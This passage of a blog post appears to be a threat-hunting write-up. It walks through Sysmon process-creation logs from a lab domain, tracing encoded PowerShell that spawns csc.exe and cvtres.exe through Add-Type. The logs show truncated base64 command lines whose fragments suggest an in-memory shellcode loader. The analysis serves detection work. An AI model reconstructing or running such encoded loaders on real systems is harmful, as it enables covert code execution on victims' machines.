class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:36.942</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Windows PowerShell</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® Windows® Operating System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: PowerShell.EXE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font color="#04ff00"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CommandLine: "C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABLAHUAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGE...</span><span style="font-variant-ligatures: no-common-ligatures;">LAAgAFsAUgBlAGYAXQAkAFQAYQBvACkAOwAkAFoAdQA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAB4ADAAMAAsACQAZABWACwAMAAsADAALAAwACkAOwA=</span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a718-5f14-a4dd-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 1236</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font color="#04ff00"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></font></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABpAHMAPQAnACQASwB1AD0AJw...</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Again, I've redacted the encoded commands to save space, but we've already reviewed them in some detail, if not enough. Note the </font><font face="courier">ProcessId 2752</font><font face="inherit"> is our third PowerShell instance.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Recall the discussion of the </font><font face="courier">Add-Type</font><font face="inherit"> cmdlet causing </font><font face="courier">csc.exe</font><font face="inherit"> and </font><font face="courier">cvtres.exe</font><font face="inherit"> to run. We can see that in the Sysmon logs.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:37 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:37.177</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a719-5f14-1cf9-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 44</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 4.8.3761.0 built by: NET48REL1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Visual C# Command Line Compiler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® .NET Framework</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: csc.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\davehull\AppData\Local\Temp\3m35xm2u\3m35xm2u.cmdline"</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Users\davehull\Documents\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User: 1011LABS\dave.hull</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hashes: MD5=F8F36858B9405FBE27377FD7E8FEC2F2,SHA256=086C38FD66AEC0E824ECB74ECE3D7124174201A9B4F5C9974FCFDBAF04A5870E,IMPHASH=950FB6F62526333E663D35BA72D19DDC</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-a718-5f14-49eb-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 2752</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: "C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABLAHUAPQAnAFs...</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Above we can see </font><font face="courier">csc.exe</font><font face="inherit"> as a child of the PowerShell process with PID of 2752. And next we see this </font><font face="courier">csc.exe</font><font face="inherit"> instance parenting </font><font face="courier">cvtres.exe</font><font face="inherit">:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:37 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:37.442</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a719-5f14-89fc-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2128</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 14.10.25028.0 built by: VCTOOLSD15RTM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Microsoft® Resource File To COFF Object Conversion Utility</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® .NET Framework</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: CVTRES.EXE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\davehull\AppData\Local\Temp\RES2896.tmp" 